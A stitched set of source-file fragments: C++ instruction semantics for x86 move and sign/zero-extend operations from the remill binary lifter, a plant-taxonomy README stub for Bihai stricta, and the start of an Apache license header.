5516 VMOVDQU16 VMOVDQU16_XMMu16_MASKmskw_MEMu16_AVX512 DATAXFER AVX512EVEX AVX512BW_128 ATTRIBUTES: DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
5517 VMOVDQU16 VMOVDQU16_XMMu16_MASKmskw_XMMu16_AVX512 DATAXFER AVX512EVEX AVX512BW_128 ATTRIBUTES: MASKOP_EVEX
5518 VMOVDQU16 VMOVDQU16_MEMu16_MASKmskw_XMMu16_AVX512 DATAXFER AVX512EVEX AVX512BW_128 ATTRIBUTES: DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
5519 VMOVDQU16 VMOVDQU16_YMMu16_MASKmskw_YMMu16_AVX512 DATAXFER AVX512EVEX AVX512BW_256 ATTRIBUTES: MASKOP_EVEX
5520 VMOVDQU16 VMOVDQU16_YMMu16_MASKmskw_MEMu16_AVX512 DATAXFER AVX512EVEX AVX512BW_256 ATTRIBUTES: DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
5521 VMOVDQU16 VMOVDQU16_YMMu16_MASKmskw_YMMu16_AVX512 DATAXFER AVX512EVEX AVX512BW_256 ATTRIBUTES: MASKOP_EVEX
5522 VMOVDQU16 VMOVDQU16_MEMu16_MASKmskw_YMMu16_AVX512 DATAXFER AVX512EVEX AVX512BW_256 ATTRIBUTES: DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
5523 VMOVDQU16 VMOVDQU16_ZMMu16_MASKmskw_ZMMu16_AVX512 DATAXFER AVX512EVEX AVX512BW_512 ATTRIBUTES: MASKOP_EVEX
5524 VMOVDQU16 VMOVDQU16_ZMMu16_MASKmskw_MEMu16_AVX512 DATAXFER AVX512EVEX AVX512BW_512 ATTRIBUTES: DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
5525 VMOVDQU16 VMOVDQU16_ZMMu16_MASKmskw_ZMMu16_AVX512 DATAXFER AVX512EVEX AVX512BW_512 ATTRIBUTES: MASKOP_EVEX
5526 VMOVDQU16 VMOVDQU16_MEMu16_MASKmskw_ZMMu16_AVX512 DATAXFER AVX512EVEX AVX512BW_512 ATTRIBUTES: DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
5535 VPMOVSXBD VPMOVSXBD_ZMMi32_MASKmskw_XMMi8_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: MASKOP_EVEX
5536 VPMOVSXBD VPMOVSXBD_ZMMi32_MASKmskw_MEMi8_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: DISP8_QUARTERMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
5537 VPMOVSXBD VPMOVSXBD_XMMi32_MASKmskw_XMMi8_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: MASKOP_EVEX
5538 VPMOVSXBD VPMOVSXBD_XMMi32_MASKmskw_MEMi8_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: DISP8_QUARTERMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
5539 VPMOVSXBD VPMOVSXBD_YMMi32_MASKmskw_XMMi8_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: MASKOP_EVEX
5540 VPMOVSXBD VPMOVSXBD_YMMi32_MASKmskw_MEMi8_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: DISP8_QUARTERMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
5627 VPMOVZXWD VPMOVZXWD_ZMMi32_MASKmskw_YMMi16_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: MASKOP_EVEX
5628 VPMOVZXWD VPMOVZXWD_ZMMi32_MASKmskw_MEMi16_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: DISP8_HALFMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
5629 VPMOVZXWD VPMOVZXWD_XMMi32_MASKmskw_XMMi16_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: MASKOP_EVEX
5630 VPMOVZXWD VPMOVZXWD_XMMi32_MASKmskw_MEMi16_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: DISP8_HALFMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
5631 VPMOVZXWD VPMOVZXWD_YMMi32_MASKmskw_XMMi16_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: MASKOP_EVEX
5632 VPMOVZXWD VPMOVZXWD_YMMi32_MASKmskw_MEMi16_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: DISP8_HALFMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
5636 VMOVDQU64 VMOVDQU64_ZMMu64_MASKmskw_ZMMu64_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: MASKOP_EVEX
5637 VMOVDQU64 VMOVDQU64_ZMMu64_MASKmskw_MEMu64_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
5638 VMOVDQU64 VMOVDQU64_ZMMu64_MASKmskw_ZMMu64_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: MASKOP_EVEX
5639 VMOVDQU64 VMOVDQU64_MEMu64_MASKmskw_ZMMu64_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
5640 VMOVDQU64 VMOVDQU64_XMMu64_MASKmskw_XMMu64_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: MASKOP_EVEX
5641 VMOVDQU64 VMOVDQU64_XMMu64_MASKmskw_MEMu64_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
5642 VMOVDQU64 VMOVDQU64_XMMu64_MASKmskw_XMMu64_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: MASKOP_EVEX
5643 VMOVDQU64 VMOVDQU64_MEMu64_MASKmskw_XMMu64_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
5644 VMOVDQU64 VMOVDQU64_YMMu64_MASKmskw_YMMu64_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: MASKOP_EVEX
5645 VMOVDQU64 VMOVDQU64_YMMu64_MASKmskw_MEMu64_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
5646 VMOVDQU64 VMOVDQU64_YMMu64_MASKmskw_YMMu64_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: MASKOP_EVEX
5647 VMOVDQU64 VMOVDQU64_MEMu64_MASKmskw_YMMu64_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
5665 VMOVDQA64 VMOVDQA64_ZMMu64_MASKmskw_ZMMu64_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: MASKOP_EVEX
5666 VMOVDQA64 VMOVDQA64_ZMMu64_MASKmskw_MEMu64_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: AVX_REQUIRES_ALIGNMENT DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION REQUIRES_ALIGNMENT
5667 VMOVDQA64 VMOVDQA64_ZMMu64_MASKmskw_ZMMu64_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: MASKOP_EVEX
5668 VMOVDQA64 VMOVDQA64_MEMu64_MASKmskw_ZMMu64_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: AVX_REQUIRES_ALIGNMENT DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION REQUIRES_ALIGNMENT
5669 VMOVDQA64 VMOVDQA64_XMMu64_MASKmskw_XMMu64_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: MASKOP_EVEX
5670 VMOVDQA64 VMOVDQA64_XMMu64_MASKmskw_MEMu64_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: AVX_REQUIRES_ALIGNMENT DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION REQUIRES_ALIGNMENT
5671 VMOVDQA64 VMOVDQA64_XMMu64_MASKmskw_XMMu64_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: MASKOP_EVEX
5672 VMOVDQA64 VMOVDQA64_MEMu64_MASKmskw_XMMu64_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: AVX_REQUIRES_ALIGNMENT DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION REQUIRES_ALIGNMENT
5673 VMOVDQA64 VMOVDQA64_YMMu64_MASKmskw_YMMu64_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: MASKOP_EVEX
5674 VMOVDQA64 VMOVDQA64_YMMu64_MASKmskw_MEMu64_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: AVX_REQUIRES_ALIGNMENT DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION REQUIRES_ALIGNMENT
5675 VMOVDQA64 VMOVDQA64_YMMu64_MASKmskw_YMMu64_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: MASKOP_EVEX
5676 VMOVDQA64 VMOVDQA64_MEMu64_MASKmskw_YMMu64_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: AVX_REQUIRES_ALIGNMENT DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION REQUIRES_ALIGNMENT
5902 VPMOVZXDQ VPMOVZXDQ_ZMMi64_MASKmskw_YMMi32_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: MASKOP_EVEX
5903 VPMOVZXDQ VPMOVZXDQ_ZMMi64_MASKmskw_MEMi32_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: DISP8_HALFMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
5904 VPMOVZXDQ VPMOVZXDQ_XMMi64_MASKmskw_XMMi32_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: MASKOP_EVEX
5905 VPMOVZXDQ VPMOVZXDQ_XMMi64_MASKmskw_MEMi32_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: DISP8_HALFMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
5906 VPMOVZXDQ VPMOVZXDQ_YMMi64_MASKmskw_XMMi32_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: MASKOP_EVEX
5907 VPMOVZXDQ VPMOVZXDQ_YMMi64_MASKmskw_MEMi32_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: DISP8_HALFMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
5931 VPMOVUSWB VPMOVUSWB_XMMu8_MASKmskw_XMMu16_AVX512 DATAXFER AVX512EVEX AVX512BW_128 ATTRIBUTES: MASKOP_EVEX
5932 VPMOVUSWB VPMOVUSWB_MEMu8_MASKmskw_XMMu16_AVX512 DATAXFER AVX512EVEX AVX512BW_128 ATTRIBUTES: DISP8_HALFMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
5933 VPMOVUSWB VPMOVUSWB_XMMu8_MASKmskw_YMMu16_AVX512 DATAXFER AVX512EVEX AVX512BW_256 ATTRIBUTES: MASKOP_EVEX
5934 VPMOVUSWB VPMOVUSWB_MEMu8_MASKmskw_YMMu16_AVX512 DATAXFER AVX512EVEX AVX512BW_256 ATTRIBUTES: DISP8_HALFMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
5935 VPMOVUSWB VPMOVUSWB_YMMu8_MASKmskw_ZMMu16_AVX512 DATAXFER AVX512EVEX AVX512BW_512 ATTRIBUTES: MASKOP_EVEX
5936 VPMOVUSWB VPMOVUSWB_MEMu8_MASKmskw_ZMMu16_AVX512 DATAXFER AVX512EVEX AVX512BW_512 ATTRIBUTES: DISP8_HALFMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
5961 VPMOVSWB VPMOVSWB_XMMi8_MASKmskw_XMMi16_AVX512 DATAXFER AVX512EVEX AVX512BW_128 ATTRIBUTES: MASKOP_EVEX
5962 VPMOVSWB VPMOVSWB_MEMi8_MASKmskw_XMMi16_AVX512 DATAXFER AVX512EVEX AVX512BW_128 ATTRIBUTES: DISP8_HALFMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
5963 VPMOVSWB VPMOVSWB_XMMi8_MASKmskw_YMMi16_AVX512 DATAXFER AVX512EVEX AVX512BW_256 ATTRIBUTES: MASKOP_EVEX
5964 VPMOVSWB VPMOVSWB_MEMi8_MASKmskw_YMMi16_AVX512 DATAXFER AVX512EVEX AVX512BW_256 ATTRIBUTES: DISP8_HALFMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
5965 VPMOVSWB VPMOVSWB_YMMi8_MASKmskw_ZMMi16_AVX512 DATAXFER AVX512EVEX AVX512BW_512 ATTRIBUTES: MASKOP_EVEX
5966 VPMOVSWB VPMOVSWB_MEMi8_MASKmskw_ZMMi16_AVX512 DATAXFER AVX512EVEX AVX512BW_512 ATTRIBUTES: DISP8_HALFMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
5990 VPMOVSXWD VPMOVSXWD_ZMMi32_MASKmskw_YMMi16_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: MASKOP_EVEX
5991 VPMOVSXWD VPMOVSXWD_ZMMi32_MASKmskw_MEMi16_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: DISP8_HALFMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
5992 VPMOVSXWD VPMOVSXWD_XMMi32_MASKmskw_XMMi16_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: MASKOP_EVEX
5993 VPMOVSXWD VPMOVSXWD_XMMi32_MASKmskw_MEMi16_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: DISP8_HALFMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
5994 VPMOVSXWD VPMOVSXWD_YMMi32_MASKmskw_XMMi16_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: MASKOP_EVEX
5995 VPMOVSXWD VPMOVSXWD_YMMi32_MASKmskw_MEMi16_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: DISP8_HALFMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
5996 VMOVHLPS VMOVHLPS_XMMf32_XMMf32_XMMf32_AVX512 DATAXFER AVX512EVEX AVX512F_128N ATTRIBUTES:
6007 VPMOVSXWQ VPMOVSXWQ_ZMMi64_MASKmskw_XMMi16_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: MASKOP_EVEX
6008 VPMOVSXWQ VPMOVSXWQ_ZMMi64_MASKmskw_MEMi16_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: DISP8_QUARTERMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
6009 VPMOVSXWQ VPMOVSXWQ_XMMi64_MASKmskw_XMMi16_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: MASKOP_EVEX
6010 VPMOVSXWQ VPMOVSXWQ_XMMi64_MASKmskw_MEMi16_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: DISP8_QUARTERMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
6011 VPMOVSXWQ VPMOVSXWQ_YMMi64_MASKmskw_XMMi16_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: MASKOP_EVEX
6012 VPMOVSXWQ VPMOVSXWQ_YMMi64_MASKmskw_MEMi16_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: DISP8_QUARTERMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
6171 VMOVDQA32 VMOVDQA32_ZMMu32_MASKmskw_ZMMu32_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: MASKOP_EVEX
6172 VMOVDQA32 VMOVDQA32_ZMMu32_MASKmskw_MEMu32_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: AVX_REQUIRES_ALIGNMENT DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION REQUIRES_ALIGNMENT
6173 VMOVDQA32 VMOVDQA32_ZMMu32_MASKmskw_ZMMu32_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: MASKOP_EVEX
6174 VMOVDQA32 VMOVDQA32_MEMu32_MASKmskw_ZMMu32_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: AVX_REQUIRES_ALIGNMENT DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION REQUIRES_ALIGNMENT
6175 VMOVDQA32 VMOVDQA32_XMMu32_MASKmskw_XMMu32_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: MASKOP_EVEX
6176 VMOVDQA32 VMOVDQA32_XMMu32_MASKmskw_MEMu32_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: AVX_REQUIRES_ALIGNMENT DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION REQUIRES_ALIGNMENT
6177 VMOVDQA32 VMOVDQA32_XMMu32_MASKmskw_XMMu32_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: MASKOP_EVEX
6178 VMOVDQA32 VMOVDQA32_MEMu32_MASKmskw_XMMu32_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: AVX_REQUIRES_ALIGNMENT DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION REQUIRES_ALIGNMENT
6179 VMOVDQA32 VMOVDQA32_YMMu32_MASKmskw_YMMu32_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: MASKOP_EVEX
6180 VMOVDQA32 VMOVDQA32_YMMu32_MASKmskw_MEMu32_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: AVX_REQUIRES_ALIGNMENT DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION REQUIRES_ALIGNMENT
6181 VMOVDQA32 VMOVDQA32_YMMu32_MASKmskw_YMMu32_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: MASKOP_EVEX
6182 VMOVDQA32 VMOVDQA32_MEMu32_MASKmskw_YMMu32_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: AVX_REQUIRES_ALIGNMENT DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION REQUIRES_ALIGNMENT
6309 VPMOVQW VPMOVQW_XMMu16_MASKmskw_ZMMu64_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: MASKOP_EVEX
6310 VPMOVQW VPMOVQW_MEMu16_MASKmskw_ZMMu64_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: DISP8_QUARTERMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
6311 VPMOVQW VPMOVQW_XMMu16_MASKmskw_XMMu64_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: MASKOP_EVEX
6312 VPMOVQW VPMOVQW_MEMu16_MASKmskw_XMMu64_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: DISP8_QUARTERMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
6313 VPMOVQW VPMOVQW_XMMu16_MASKmskw_YMMu64_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: MASKOP_EVEX
6314 VPMOVQW VPMOVQW_MEMu16_MASKmskw_YMMu64_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: DISP8_QUARTERMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
6325 VPMOVQB VPMOVQB_XMMu8_MASKmskw_ZMMu64_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: MASKOP_EVEX
6326 VPMOVQB VPMOVQB_MEMu8_MASKmskw_ZMMu64_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: DISP8_EIGHTHMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
6327 VPMOVQB VPMOVQB_XMMu8_MASKmskw_XMMu64_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: MASKOP_EVEX
6328 VPMOVQB VPMOVQB_MEMu8_MASKmskw_XMMu64_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: DISP8_EIGHTHMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
6329 VPMOVQB VPMOVQB_XMMu8_MASKmskw_YMMu64_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: MASKOP_EVEX
6330 VPMOVQB VPMOVQB_MEMu8_MASKmskw_YMMu64_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: DISP8_EIGHTHMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
6331 VPMOVQD VPMOVQD_YMMu32_MASKmskw_ZMMu64_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: MASKOP_EVEX
6332 VPMOVQD VPMOVQD_MEMu32_MASKmskw_ZMMu64_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: DISP8_HALFMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
6333 VPMOVQD VPMOVQD_XMMu32_MASKmskw_XMMu64_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: MASKOP_EVEX
6334 VPMOVQD VPMOVQD_MEMu32_MASKmskw_XMMu64_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: DISP8_HALFMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
6335 VPMOVQD VPMOVQD_XMMu32_MASKmskw_YMMu64_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: MASKOP_EVEX
6336 VPMOVQD VPMOVQD_MEMu32_MASKmskw_YMMu64_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: DISP8_HALFMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION
6349 VPMOVM2Q VPMOVM2Q_XMMu64_MASKmskw_AVX512 DATAXFER AVX512EVEX AVX512DQ_128 ATTRIBUTES:
6350 VPMOVM2Q VPMOVM2Q_YMMu64_MASKmskw_AVX512 DATAXFER AVX512EVEX AVX512DQ_256 ATTRIBUTES:
6351 VPMOVM2Q VPMOVM2Q_ZMMu64_MASKmskw_AVX512 DATAXFER AVX512EVEX AVX512DQ_512 ATTRIBUTES:
*/
namespace {
template <typename D, typename S>
DEF_SEM(MOVZX, D dst, S src) {
WriteZExt(dst, Read(src));
return memory;
}
template <typename D, typename S, typename SextT>
DEF_SEM(MOVSX, D dst, S src) {
WriteZExt(dst, SExtTo<SextT>(Read(src)));
return memory;
}
} // namespace
DEF_ISEL(MOVZX_GPRv_MEMb_16) = MOVZX<R16W, M8>;
DEF_ISEL(MOVZX_GPRv_MEMb_32) = MOVZX<R32W, M8>;
IF_64BIT(DEF_ISEL(MOVZX_GPRv_MEMb_64) = MOVZX<R64W, M8>;)
DEF_ISEL(MOVZX_GPRv_GPR8_16) = MOVZX<R16W, R8>;
DEF_ISEL(MOVZX_GPRv_GPR8_32) = MOVZX<R32W, R8>;
IF_64BIT(DEF_ISEL(MOVZX_GPRv_GPR8_64) = MOVZX<R64W, R8>;)
DEF_ISEL(MOVZX_GPRv_MEMw_32) = MOVZX<R32W, M16>;
IF_64BIT(DEF_ISEL(MOVZX_GPRv_MEMw_64) = MOVZX<R64W, M16>;)
DEF_ISEL(MOVZX_GPRv_GPR16_32) = MOVZX<R32W, R16>;
IF_64BIT(DEF_ISEL(MOVZX_GPRv_GPR16_64) = MOVZX<R64W, R16>;)
DEF_ISEL(MOVSX_GPRv_MEMb_16) = MOVSX<R16W, M8, int16_t>;
DEF_ISEL(MOVSX_GPRv_MEMb_32) = MOVSX<R32W, M8, int32_t>;
IF_64BIT(DEF_ISEL(MOVSX_GPRv_MEMb_64) = MOVSX<R64W, M8, int64_t>;)
DEF_ISEL(MOVSX_GPRv_GPR8_16) = MOVSX<R16W, R8, int16_t>;
DEF_ISEL(MOVSX_GPRv_GPR8_32) = MOVSX<R32W, R8, int32_t>;
IF_64BIT(DEF_ISEL(MOVSX_GPRv_GPR8_64) = MOVSX<R64W, R8, int64_t>;)
DEF_ISEL(MOVSX_GPRv_MEMw_32) = MOVSX<R32W, M16, int32_t>;
IF_64BIT(DEF_ISEL(MOVSX_GPRv_MEMw_64) = MOVSX<R64W, M16, int64_t>;)
DEF_ISEL(MOVSX_GPRv_GPR16_32) = MOVSX<R32W, R16, int32_t>;
IF_64BIT(DEF_ISEL(MOVSX_GPRv_GPR16_64) = MOVSX<R64W, R16, int64_t>;)
DEF_ISEL(MOVSXD_GPRv_GPRz_16) = MOVSX<R32W, R16, int32_t>;
DEF_ISEL(MOVSXD_GPRv_GPRz_32) = MOVSX<R32W, R32, int32_t>;
IF_64BIT(DEF_ISEL(MOVSXD_GPRv_MEMd_32) = MOVSX<R64W, M32, int64_t>;)
IF_64BIT(DEF_ISEL(MOVSXD_GPRv_GPR32_32) = MOVSX<R64W, R32, int64_t>;)
IF_64BIT(DEF_ISEL(MOVSXD_GPRv_MEMd_64) = MOVSX<R64W, M32, int64_t>;)
IF_64BIT(DEF_ISEL(MOVSXD_GPRv_MEMz_64) = MOVSX<R64W, M32, int64_t>;)
IF_64BIT(DEF_ISEL(MOVSXD_GPRv_GPR32_64) = MOVSX<R64W, R32, int64_t>;)
IF_64BIT(DEF_ISEL(MOVSXD_GPRv_GPRz_64) = MOVSX<R64W, R32, int64_t>;)
#if HAS_FEATURE_AVX512
namespace {
template <typename D, typename K, typename S>
DEF_SEM(VPMOVSXBQ_MASKmskw_SIMD128, D dst, K k1, S src) {
auto src_vec = SReadV8(src);
auto dst_vec = SClearV64(SReadV64(dst));
auto k_vec = Read(k1);
for (auto i = 0u; i < 2u; i++) {
if (READBIT(k_vec, i) == 0) {
dst_vec = SInsertV64(dst_vec, i, 0);
} else {
auto v = SExtTo<int64_t>(SExtractV8(src_vec, i));
dst_vec = SInsertV64(dst_vec, i, v);
}
}
SWriteV64(dst, dst_vec);
return memory;
}
template <typename D, typename K, typename S>
DEF_SEM(VPMOVSXWD_MASKmskw_SIMD128, D dst, K k1, S src) {
auto src_vec = SReadV16(src);
auto dst_vec = SClearV32(SReadV32(dst));
auto k_vec = Read(k1);
for (auto i = 0u; i < 4u; i++) {
if (READBIT(k_vec, i) == 0) {
dst_vec = SInsertV32(dst_vec, i, 0);
} else {
auto v = SExtTo<int32_t>(SExtractV16(src_vec, i));
dst_vec = SInsertV32(dst_vec, i, v);
}
}
SWriteV32(dst, dst_vec);
return memory;
}
template <typename S1, typename S2>
DEF_SEM(KMOVW, S1 dst, S2 src) {
WriteZExt(dst, UInt16(Read(src)));
return memory;
}
} // namespace
DEF_ISEL(VPMOVSXBQ_XMMi64_MASKmskw_MEMi8_AVX512) = VPMOVSXBQ_MASKmskw_SIMD128<VV128W, R8, MV16>;
DEF_ISEL(VPMOVSXBQ_XMMi64_MASKmskw_XMMi8_AVX512) = VPMOVSXBQ_MASKmskw_SIMD128<VV128W, R8, V128>;
DEF_ISEL(VPMOVSXWD_XMMi32_MASKmskw_MEMi16_AVX512) = VPMOVSXWD_MASKmskw_SIMD128<VV128W, R8, MV64>;
DEF_ISEL(VPMOVSXWD_XMMi32_MASKmskw_XMMi16_AVX512) = VPMOVSXWD_MASKmskw_SIMD128<VV128W, R8, V128>;
DEF_ISEL(KMOVW_MASKmskw_MASKu16_AVX512) = KMOVW<R64W, R64>;
DEF_ISEL(KMOVW_GPR32u32_MASKmskw_AVX512) = KMOVW<R32W, R64>;
DEF_ISEL(KMOVW_MASKmskw_GPR32u32_AVX512) = KMOVW<R64W, R32>;
DEF_ISEL(KMOVW_MASKmskw_MEMu16_AVX512) = KMOVW<R64W, M16>;
DEF_ISEL(KMOVW_MEMu16_MASKmskw_AVX512) = KMOVW<M16W, R64>;
#endif // HAS_FEATURE_AVX512
| trailofbits/remill | lib/Arch/X86/Semantics/DATAXFER.cpp | C++ | apache-2.0 | 75,427 |
# Bihai stricta (Huber) Griggs SPECIES
#### Status
SYNONYM
#### According to
The Catalogue of Life, 3rd January 2011
#### Published in
null
#### Original name
null
### Remarks
null | mdoering/backbone | life/Plantae/Magnoliophyta/Liliopsida/Zingiberales/Heliconiaceae/Heliconia/Heliconia stricta/ Syn. Bihai stricta/README.md | Markdown | apache-2.0 | 185 |
/**
* Copyright 2011-2017 Asakusa Framework Team.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
